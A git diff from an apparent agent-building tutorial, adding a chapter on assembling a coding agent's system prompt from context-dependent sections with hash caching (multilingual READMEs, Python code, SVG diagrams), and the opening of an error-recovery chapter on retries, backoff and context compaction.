(CLAUDE.md) and system context (git status) are added on top. + +
+ + diff --git a/s10_system_prompt/README.ja.md b/s10_system_prompt/README.ja.md new file mode 100644 index 000000000..1d17d7b7d --- /dev/null +++ b/s10_system_prompt/README.ja.md @@ -0,0 +1,235 @@ +# s10: System Prompt — 実行時アセンブリ、ハードコードなし + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s08 → s09 → `s10` → [s11](../s11_error_recovery/) → s12 → ... → s19 + +> *"prompt は組み立てるもの、書き殺すものではない"* — セクション分割 + オンデマンド結合。 +> +> **Harness 層**: プロンプト — 実行時アセンブリ、ハードコードなし。 + +--- + +## 課題 + +s01 から s09 まで、system prompt は常に 1 行のハードコードでした: + +```python +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks." +``` + +s01 では十分でした — bash、read、write の 3 ツールのみ。しかし s09 では、Agent は記憶、圧縮、スキルロードを持っています。プロンプトが言及すべき機能が増え続けます: + +```python +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "Use tools to solve tasks. Act, don't explain. " + "Before starting any multi-step task, use todo_write. " + "Skills are available via list_skills and load_skill. " + "Relevant memories are injected below when available. " + # ... 機能追加のたびに段落が増える +) +``` + +3 つの問題: + +1. **プロジェクト変更でプロンプト全体を書き直し** — Python から React への切り替え時、どこを変えるべきか不明 +2. **一箇所の修正が全体に影響** — ツール説明を追加すると、前の指示と競合する可能性 +3. **毎リクエストで全内容を送信** — スキルロードを使わない会話でも、その説明がトークンを無駄に消費 + +**プロンプトはレゴブロックのように — 異なるシーンで異なるブロックを組み立てる、一枚岩のセメントではなく。** + +--- + +## ソリューション + +![System Prompt Overview](images/system-prompt-overview.ja.svg) + +s09 のループ、圧縮、記憶はすべて保持。唯一の変更:ハードコードの `SYSTEM` を独立したセクションに分割し、実行時にコンテキストに応じて組み立て、キャッシュで再組み立てを回避。 + +6 つのセクション、3 つのロード戦略: + +| セクション | ロード戦略 | 内容 | +|-----------|-----------|------| +| identity | 常時 | あなたは誰か、どう動くか | +| tools | 常時 | 利用可能ツール一覧 | +| workspace | 常時 | 作業ディレクトリ、環境情報 | +| planning | オンデマンド | マルチステップタスク時の計画指指示 | +| skills | オンデマンド | 利用可能スキルがある時にロード | +| memory | オンデマンド | 関連記憶がある時に注入 | + +--- + +## 仕組み + +### PROMPT_SECTIONS: セクション定義 + +長い文字列をディクショナリに分割。各 key が 1 つのテーマ: + +```python +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} +``` + +各セクションは独立して保守 — `tools` を変更しても `identity` に影響なし、`memory` を追加しても `planning` に触れない。 + +### assemble_system_prompt: オンデマンド組み立て + +ディクショナリは用意できましたが、毎回すべてのセクションが必要なわけではありません。現在の会話にマルチステップタスクがなければ、`planning` をロードしてもトークンの無駄。`context` に基づいて何をロードするか決定: + +```python +def assemble_system_prompt(context: dict) -> str: + """現在のコンテキストに基づいて system prompt を組み立てる。""" + sections = [] + + # 常時ロード + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # オンデマンド + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) +``` + +「常時ロード」は毎ターン必要 — アイデンティティ、ツール、作業ディレクトリ。「オンデマンド」は特定条件下でのみ有用。 + +なぜ全部ロードしない?**トークンにはコストがある**(system prompt は毎ターン課金)、そして**情報が少ないほど LLM は集中する**(無関係な指示はノイズ)。 + +### get_system_prompt: キャッシュで再組み立てを回避 + +コンテキストが変わっていない時(同一ターン内の複数 LLM 呼び出し、context が同一)、再度組み立てるのは無駄。hash で変化を検出 — キャッシュヒットなら即座に返却: + +```python +_last_context_hash = None +_last_prompt = None + +def get_system_prompt(context: dict) -> str: + """キャッシュ付き system prompt 取得。""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + return _last_prompt +``` + +キャッシュの前提:`context` が変化した時のみ再組み立て。CC は API 層にもプロンプトキャッシュを持っています — 静的部分は global cache、動的部分は org cache — チュートリアル版は hash で簡略化。 + +### 組み合わせて実行 + +```python +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + # ... ツール実行 ... + context = update_context(context, messages) + system = get_system_prompt(context) +``` + +各ループ冒頭で system prompt を 1 回取得。context が変わっていれば再組み立て、変わっていなければキャッシュを返却。 + +--- + +## s09 からの変更 + +| コンポーネント | 変更前 (s09) | 変更後 (s10) | +|--------------|------------|------------| +| プロンプト | ハードコード SYSTEM 文字列 | PROMPT_SECTIONS + assemble_system_prompt | +| キャッシュ | なし | get_system_prompt(hash 検出 + キャッシュ) | +| 新規関数 | — | assemble_system_prompt, get_system_prompt | +| ツール | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 変更なし | +| ループ | 固定 SYSTEM を使用 | get_system_prompt(context) を使用 | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s10_system_prompt/code.py +``` + +観察ポイント: + +1. 出力でロードされたセクションを確認(`[assembled] sections: ...` ラベル) +2. 継続会話で、context 変化後にプロンプトが再組み立てされるか +3. キャッシュヒット時に `[cache hit]` が表示され、再組み立てがスキップされるか + +--- + +## 次の章 + +system prompt の組み立て、記憶、圧縮 — すべて揃いました。Agent は何でも処理できそうに見えます — しかし LLM 呼び出しが失敗するまでは。 + +ネットワーク揺らぎ、API レート制限、出力の切り詰め、コンテキスト超過 — これらはバグではなく日常。Agent は最初のエラーでクラッシュしてはいけません。 + +s11 Error Recovery → 4 つのリカバリパス。トークンアップグレード、コンテキスト圧縮、指数バックオフ、モデル切り替え。エラーは終わりではなく、リトライの始まり。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `prompts.ts`(914 行)、`systemPromptSections.ts`(68 行)、`context.ts`(189 行)の完全分析に基づきます。 + +### 一、数段落ではなく、21 のセクション + +チュートリアル版は単純なディクショナリでプロンプト断片を格納。CC の system prompt は 21 のセクションで構成され、静的・動的の 2 層に分かれます: + +**静的(組織横断でキャッシュ可能)**:identity、system、doing_tasks、actions、using_tools、tone_style、output_efficiency — 常にロード。 + +**動的(レジストリ経由で解決)**:session_guidance、memory、env_info、language、output_style、mcp_instructions、scratchpad、frc、summarize_tool_results、token_budget — キャッシュポリシーに従いロード。 + +`mcp_instructions` は唯一の**揮発性**セクション(`cacheBreak: true`)— MCP サーバーはターン間で接続・切断可能なため。 + +### 二、アセンブリ関数シグネチャ + +```typescript +getSystemPrompt(tools, model, additionalWorkingDirs?, mcpClients?): Promise +``` + +`string[]`(各要素が 1 セクション)を返却。`SYSTEM_PROMPT_DYNAMIC_BOUNDARY` で静的・動的部分を区切り。この区切り文字は Anthropic API の `cache_scope` の決定にも使用 — 境界前は `global`、境界後は `org`。 + +### 三、3 層キャッシュ + +1. **lodash memoize**:`getSystemContext` と `getUserContext` はセッション全体でキャッシュ(`context.ts:36,116,155`) +2. **レジストリキャッシュ**:`STATE.systemPromptSectionCache`(`bootstrap/state.ts:203`)が動的セクションの結果をキャッシュ。`/clear` または `/compact` 時にクリア +3. **API レベルキャッシュ**:`splitSysPromptPrefix()`(`api.ts:321`)がプロンプトを異なる `cache_scope` のチャンクに分割 — 静的部分は global cache、動的部分は org cache + +### 四、getUserContext vs getSystemContext + +| | getSystemContext | getUserContext | +|---|---|---| +| 内容 | gitStatus、cacheBreaker | CLAUDE.md 内容、currentDate | +| 注入方式 | system prompt 配列に**追加** | `` ユーザーメッセージとして**前置** | +| スキップ条件 | カスタム system prompt 使用時 | 常時実行 | + +### 五、モードによるプロンプトの変化 + +- **CLAUDE_CODE_SIMPLE**:プロンプト全体がわずか 2 行 +- **Proactive/KAIROS**:全標準セクションをコンパクト版プロンプトに置換 +- **Coordinator**:コーディネータ専用プロンプトに完全置換 +- **Agent モード**:Agent 定義プロンプトがデフォルトプロンプトを置換または追加 + +### 六、合計サイズ + +標準インタラクティブモードの system prompt コアは約 20-30KB のテキスト。CLAUDE_CODE_SIMPLE は約 150 文字。ユーザーコンテキスト(CLAUDE.md)とシステムコンテキスト(git status)がその上に累積。 + +
+ + diff --git a/s10_system_prompt/README.md b/s10_system_prompt/README.md new file mode 100644 index 000000000..f808ec99f --- /dev/null +++ b/s10_system_prompt/README.md @@ -0,0 +1,235 @@ +# s10: System Prompt — 运行时组装,不硬编码 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s08 → s09 → `s10` → [s11](../s11_error_recovery/) → s12 → ... → s19 + +> *"prompt 是组装出来的, 不是写死的"* — 分段 + 按需拼接。 +> +> **Harness 层**: 提示 — 运行时组装, 不硬编码。 + +--- + +## 问题 + +从 s01 到 s09,system prompt 都是一行硬编码: + +```python +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks." +``` + +s01 够用——只有 bash、read、write 三个工具。但到 s09,Agent 已经有记忆、有压缩、有技能加载。prompt 该提的能力越来越多: + +```python +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "Use tools to solve tasks. Act, don't explain. " + "Before starting any multi-step task, use todo_write. " + "Skills are available via list_skills and load_skill. " + "Relevant memories are injected below when available. " + # ... 加一个能力就多一段 +) +``` + +三个问题: + +1. **换项目要重写整个 prompt**——从 Python 换到 React,不知道哪些该改、哪些该留 +2. **修改一处可能影响全局**——加一段工具描述,可能跟前面的指令冲突 +3. **每次请求都带全部内容**——即使当前对话用不到技能加载,也带着那段描述浪费 token + +**prompt 应该像乐高——不同场景拼不同的积木,而不是一整块水泥。** + +--- + +## 解决方案 + +![System Prompt Overview](images/system-prompt-overview.svg) + +s09 的循环、压缩、记忆全部保留。唯一的变动:把硬编码的 `SYSTEM` 拆成独立段落(section),运行时根据上下文按需拼接,缓存结果避免重复组装。 + +六个 section,三种加载策略: + +| Section | 加载策略 | 内容 | +|---------|---------|------| +| identity | 始终 | 你是谁、怎么做事 | +| tools | 始终 | 可用工具列表 | +| workspace | 始终 | 工作目录、环境信息 | +| planning | 按需 | 多步任务时加载规划指令 | +| skills | 按需 | 有可用技能时加载 | +| memory | 按需 | 有相关记忆时注入 | + +--- + +## 工作原理 + +### PROMPT_SECTIONS: 分段定义 + +把一大段字符串拆成字典,每个 key 是一个主题: + +```python +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} +``` + +每个 section 独立维护——修改 `tools` 不影响 `identity`,新增 `memory` 不动 `planning`。 + +### assemble_system_prompt: 按需拼接 + +字典有了,但不是所有 section 每次都需要。当前对话没有多步任务,加载 `planning` 只是浪费 token。根据 `context` 决定加载哪些: + +```python +def assemble_system_prompt(context: dict) -> str: + """根据当前上下文组装 system prompt。""" + sections = [] + + # 始终加载 + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # 按需加载 + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) +``` + +"始终加载"的是每轮都需要的——身份、工具、工作目录。"按需加载"的只在特定条件下才有用。 + +为什么不全加载?**token 有成本**(system prompt 每轮计费),**信息越少 LLM 越专注**(无关指令是噪音)。 + +### get_system_prompt: 缓存避免重复拼接 + +上下文没变时(同一轮对话的多次 LLM 调用,context 相同),重新拼接是浪费。用 hash 检测变化,命中缓存直接返回: + +```python +_last_context_hash = None +_last_prompt = None + +def get_system_prompt(context: dict) -> str: + """带缓存的 system prompt 获取。""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + return _last_prompt +``` + +缓存的前提:`context` 变了才重新组装。CC 在 API 层还有 prompt cache——静态部分 global cache,动态部分 org cache——教学版用 hash 简化。 + +### 合起来跑 + +```python +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + # ... 工具执行 ... + context = update_context(context, messages) + system = get_system_prompt(context) +``` + +每轮循环开头拿一次 system prompt。context 变了就重新组装,没变就返回缓存。 + +--- + +## 相对 s09 的变更 + +| 组件 | 之前 (s09) | 之后 (s10) | +|------|-----------|-----------| +| prompt | 硬编码 SYSTEM 字符串 | PROMPT_SECTIONS + assemble_system_prompt | +| 缓存 | 无 | get_system_prompt(hash 检测 + 缓存) | +| 新函数 | — | assemble_system_prompt, get_system_prompt | +| 工具 | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 不变 | +| 循环 | 用固定 SYSTEM | 用 get_system_prompt(context) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s10_system_prompt/code.py +``` + +观察重点: + +1. 输出中能看到哪些 section 被加载了(`[assembled] sections: ...` 标签) +2. 连续对话时,context 变化后 prompt 是否重新组装 +3. 缓存命中时,是否显示 `[cache hit]` 跳过重新拼接 + +--- + +## 接下来 + +system prompt 组装好了、记忆有了、压缩有了。Agent 看起来什么都能处理——直到 LLM 调用失败。 + +网络抖动、API 限流、输出被截断、上下文超限——这些不是 bug,是常态。Agent 不能一碰错误就崩溃。 + +s11 Error Recovery → 四条恢复路径。升级 token、压缩上下文、指数退避、切换模型。错误不是结束,是重试的开始。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `prompts.ts`(914 行)、`systemPromptSections.ts`(68 行)、`context.ts`(189 行)的完整分析。 + +### 一、不是几段话,是 21 个 Section + +教学版用简单的字典存储 prompt 片段。CC 的 system prompt 由 21 个 section 组成,分静态和动态两层: + +**静态(跨组织可缓存)**:identity、system、doing_tasks、actions、using_tools、tone_style、output_efficiency——这些始终加载。 + +**动态(通过注册管理机构解析)**:session_guidance、memory、env_info、language、output_style、mcp_instructions、scratchpad、frc、summarize_tool_results、token_budget——这些按缓存策略加载。 + +`mcp_instructions` 是唯一的**易失性** section(`cacheBreak: true`)——因为 MCP server 可以在轮次间连接和断开。 + +### 二、组装函数签名 + +```typescript +getSystemPrompt(tools, model, additionalWorkingDirs?, mcpClients?): Promise +``` + +返回 `string[]`(每个元素是一个 section),由 `SYSTEM_PROMPT_DYNAMIC_BOUNDARY` 分隔静态和动态部分。这个分隔符还用来确定 Anthropic API 的 `cache_scope`——边界前 `global`,边界后 `org`。 + +### 三、三层缓存 + +1. **lodash memoize**:`getSystemContext` 和 `getUserContext` 在整个会话中缓存(`context.ts:36,116,155`) +2. **注册管理机构缓存**:`STATE.systemPromptSectionCache`(`bootstrap/state.ts:203`)缓存动态 section 的结果。`/clear` 或 `/compact` 时清除 +3. **API 级缓存**:`splitSysPromptPrefix()`(`api.ts:321`)把 prompt 分成带不同 `cache_scope` 的块——静态部分 global cache,动态部分 org cache + +### 四、getUserContext vs getSystemContext + +| | getSystemContext | getUserContext | +|---|---|---| +| 内容 | gitStatus、cacheBreaker | CLAUDE.md 内容、currentDate | +| 注入方式 | **追加**到 system prompt 数组 | **前置**为 `` 用户消息 | +| 何时跳过 | 自定义 system prompt 时 | 始终运行 | + +### 五、模式如何改变 Prompt + +- **CLAUDE_CODE_SIMPLE**:整个 prompt 只有 2 行 +- **Proactive/KAIROS**:用紧凑版 prompt 替换所有标准 section +- **Coordinator**:用协调器专用 prompt 完全替换 +- **Agent 模式**:Agent 定义的 prompt 替换或追加到默认 prompt + +### 六、总大小 + +标准交互模式下 system prompt 核心约 20-30KB 文本。CLAUDE_CODE_SIMPLE 约 150 字符。用户上下文(CLAUDE.md)和系统上下文(git status)在此基础上累加。 + +
+ + diff --git a/s10_system_prompt/code.py b/s10_system_prompt/code.py new file mode 100644 index 000000000..51448cc53 --- /dev/null +++ b/s10_system_prompt/code.py @@ -0,0 +1,217 @@ +#!/usr/bin/env python3 +""" +s10: System Prompt — Runtime prompt assembly with hash-based caching. + +Run: python s10_system_prompt/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s09: + - PROMPT_SECTIONS: topic-keyed dict of prompt fragments + - assemble_system_prompt(context): select + join sections by context + - get_system_prompt(context): hash-based cache wrapper + - agent_loop uses get_system_prompt(context) instead of hardcoded SYSTEM + +ASCII flow: + PROMPT_SECTIONS ──→ assemble_system_prompt(context) ──→ get_system_prompt (cache) + │ + ▼ system= + messages[] ──→ compress ──→ load memories ──→ LLM ──→ tools ──→ loop +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Prompt Sections ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + """Select and join prompt sections based on current context.""" + sections = [] + + # Always loaded + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # Conditional + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) + + +_last_context_hash = None +_last_prompt = None + + +def get_system_prompt(context: dict) -> str: + """Cache wrapper — reassemble only when context changes.""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + print(" \033[90m[cache hit] system prompt unchanged\033[0m") + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + + loaded = ["identity", "tools", "workspace"] + if context.get("has_todos"): + loaded.append("planning") + if context.get("has_skills"): + loaded.append("skills") + if context.get("memories"): + loaded.append("memory") + print(f" \033[32m[assembled] sections: {', '.join(loaded)}\033[0m") + return _last_prompt + + +# ── Tools ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, +] + +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + """Derive context from current conversation state.""" + text = " ".join(str(m.get("content", ""))[:200] for m in messages[-6:]).lower() + return { + "has_todos": "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", ""), + } + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + """Main loop — uses assembled system prompt instead of hardcoded SYSTEM.""" + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + + # Re-evaluate context and prompt after each tool round + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s10: system prompt") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms10 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s10_system_prompt/images/system-prompt-overview.en.svg b/s10_system_prompt/images/system-prompt-overview.en.svg new file mode 100644 index 000000000..3e504c950 --- /dev/null +++ b/s10_system_prompt/images/system-prompt-overview.en.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + System Prompt — PROMPT_SECTIONS + On-Demand Assembly + Cache + + + + s09 Preserved + + s10 New + + + + + + PROMPT_SECTIONS + ✓ identity (always) + ✓ tools (always) + ✓ workspace (always) + ○ planning · skills · memory + + + + + + + assemble_system_prompt + Input: context dict + Always: identity + tools + workspace + On-demand: planning · skills · memory + Output: "\n\n".join(selected) + + + + + + + get_system_prompt + hash(context) + Hit → return cached + Miss → assemble + store + (s10 new) + + + + system= + + + + + + messages[] + + + + + + + Compression + Loading + snip → micro → budget → auto + → load memory (s09) + + + + + + + LLM + system = assembled + + + + + + + TOOL_HANDLERS + bash · read · write + (s09 preserved) + + + + Tool results → messages[] → compress → load memory → assemble prompt → LLM + + + + + s09 Preserved: loop, compression pipeline, memory loading, tool execution + + s10 New: PROMPT_SECTIONS (6 sections) + assemble_system_prompt + get_system_prompt (cache) + diff --git a/s10_system_prompt/images/system-prompt-overview.ja.svg b/s10_system_prompt/images/system-prompt-overview.ja.svg new file mode 100644 index 000000000..ba912aaaa --- /dev/null +++ b/s10_system_prompt/images/system-prompt-overview.ja.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + System Prompt — PROMPT_SECTIONS + オンデマンド組み立て + キャッシュ + + + + s09 保持 + + s10 新規 + + + + + + PROMPT_SECTIONS + ✓ identity (常時) + ✓ tools (常時) + ✓ workspace (常時) + ○ planning · skills · memory + + + + + + + assemble_system_prompt + 入力: context dict + 常時: identity + tools + workspace + オンデマンド: planning · skills · memory + 出力: "\n\n".join(selected) + + + + + + + get_system_prompt + hash(context) + ヒット → キャッシュ返却 + ミス → assemble + 保存 + (s10 新規) + + + + system= + + + + + + messages[] + + + + + + + 圧縮 + ロード + snip → micro → budget → auto + → 記憶ロード (s09) + + + + + + + LLM + system = assembled + + + + + + + TOOL_HANDLERS + bash · read · write + (s09 保持) + + + + ツール結果 → messages[] → 圧縮 → 記憶ロード → プロンプト組み立て → LLM + + + + + s09 保持:ループ、圧縮パイプライン、記憶ロード、ツール実行 + + s10 新規:PROMPT_SECTIONS(6 セクション)+ assemble_system_prompt + get_system_prompt(キャッシュ) + diff --git a/s10_system_prompt/images/system-prompt-overview.svg b/s10_system_prompt/images/system-prompt-overview.svg new file mode 100644 index 000000000..37f8bff70 --- /dev/null +++ b/s10_system_prompt/images/system-prompt-overview.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + System Prompt — PROMPT_SECTIONS + 按需拼接 + 缓存 + + + + s09 保留 + + s10 新增 + + + + + + PROMPT_SECTIONS + ✓ identity (始终) + ✓ tools (始终) + ✓ workspace (始终) + ○ planning · skills · memory + + + + + + + assemble_system_prompt + 输入: context dict + 始终: identity + tools + workspace + 按需: planning · skills · memory + 输出: "\n\n".join(selected) + + + + + + + get_system_prompt + hash(context) + 命中 → 返回缓存 + 未命中 → assemble + 存 + (s10 新增) + + + + system= + + + + + + messages[] + + + + + + + 压缩 + Loading + snip → micro → budget → auto + → 加载记忆 (s09) + + + + + + + LLM + system = assembled + + + + + + + TOOL_HANDLERS + bash · read · write + (s09 保留) + + + + 工具结果 → messages[] → 压缩 → 加载记忆 → 组装 prompt → LLM + + + + + s09 保留:循环、压缩管线、记忆加载、工具执行 + + s10 新增:PROMPT_SECTIONS(6 段)+ assemble_system_prompt + get_system_prompt(缓存) + diff --git a/s11_error_recovery/README.en.md b/s11_error_recovery/README.en.md new file mode 100644 index 000000000..c8f8673df --- /dev/null +++ b/s11_error_recovery/README.en.md @@ -0,0 +1,257 @@ +# s11: Error Recovery — Errors aren't the end, they're the start of a retry + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s09 → s10 → `s11` → [s12](../s12_task_system/) → s13 → ... → s19 +> *"Errors aren't the end, they're the start of a retry"* — escalate tokens, compact context, switch models. +> +> **Harness layer**: Resilience — classify and recover when the main loop hits errors. + +--- + +## The Problem + +The Agent is running along and then errors out: + +``` +Error: 529 overloaded +``` + +The Agent crashes. It doesn't retry, doesn't switch models, doesn't reduce context — it just crashes. + +In production, API errors are the norm. The three most common failure modes: **truncated output** (the model runs out of tokens mid-sentence), **context overflow** (still too long even after compaction), and **transient failures** (429 rate limiting / 529 overload / network drops). An Agent that doesn't handle errors is like a car that stalls at the slightest touch. + +--- + +## Solution + +![Error Recovery Overview](images/error-recovery-overview.en.svg) + +The loop and prompt assembly from s10 are fully preserved. The only change: the LLM call is wrapped in try/except, with different recovery paths based on error type. After recovery, `continue` loops back to the top to call the LLM again. + +The three most common recovery patterns (CC actually has 13+ reason codes; see the Deep Dive for the rest): + +| Pattern | Trigger | Recovery Action | +|----------|---------|-----------------| +| Output truncated | `max_tokens` | Escalate 8K→64K / continuation prompt | +| Context overflow | `prompt_too_long` | Reactive compact → retry | +| Transient failure | 429 / 529 | Exponential backoff + jitter | + +--- + +## How It Works + +### Path 1: Output Truncated + +The model runs out of tokens mid-sentence — `max_tokens` is exhausted. The default 8000 tokens isn't enough for a complete response. + +On the first occurrence, escalate `max_tokens` from 8K to 64K (8x the space) and retry the same request. If 64K is still not enough, inject a continuation prompt telling the model to pick up where it left off, up to 3 times: + +```python +ESCALATED_MAX_TOKENS = 64000 + +if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. Pick up mid-thought."}) + state.recovery_count += 1 + continue +``` + +Escalation gets one chance; continuation gets up to 3. After that, exit — further continuations won't produce meaningful output. + +### Path 2: Context Overflow + +The LLM says "your context is too long" (`prompt_too_long`). All four compaction layers from s08 have already run, and it's still over the limit. + +Trigger reactive compact — more aggressive than auto compact, keeping only the last 5 messages plus a summary. Retry after compacting. But if it's still over the limit after one compaction, the only option is to exit — compacting again won't make it any smaller: + +```python +except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return # Already compacted and still over limit — must exit +``` + +### Path 3: Transient Failures + +Network blips, 429 rate limiting, 529 overload — these aren't bugs, they're normal in distributed systems. + +Exponential backoff + jitter: wait 0.5 seconds on the first attempt, 1 second on the second, 2 seconds on the third, up to 10 retries. Random jitter prevents concurrent requests from all retrying at the same instant. Three consecutive 529 overload errors → switch to the fallback model: + +```python +def with_retry(fn, state, max_retries=10): + for attempt in range(max_retries): + try: + return fn() + except RateLimitError: + delay = min(500 * (2 ** attempt), 32000) + random_jitter() + time.sleep(delay / 1000) + except OverloadedError: + state.consecutive_529 += 1 + if state.consecutive_529 >= 3: + switch_to_fallback_model() + time.sleep(500 / 1000) + raise MaxRetriesExceeded() +``` + +Backoff formula: `min(500 × 2^attempt, 32000) + random(0~25%)`. If the server returns a `Retry-After` header, that value takes priority. + +### Putting It All Together + +```python +def agent_loop(messages, context): + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = 8000 + + while True: + try: + response = with_retry( + lambda: client.messages.create( + model=MODEL, system=system, + messages=messages, tools=TOOLS, + max_tokens=max_tokens), + state) + except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return + except Exception as e: + log_error(e) + return + + messages.append({"role": 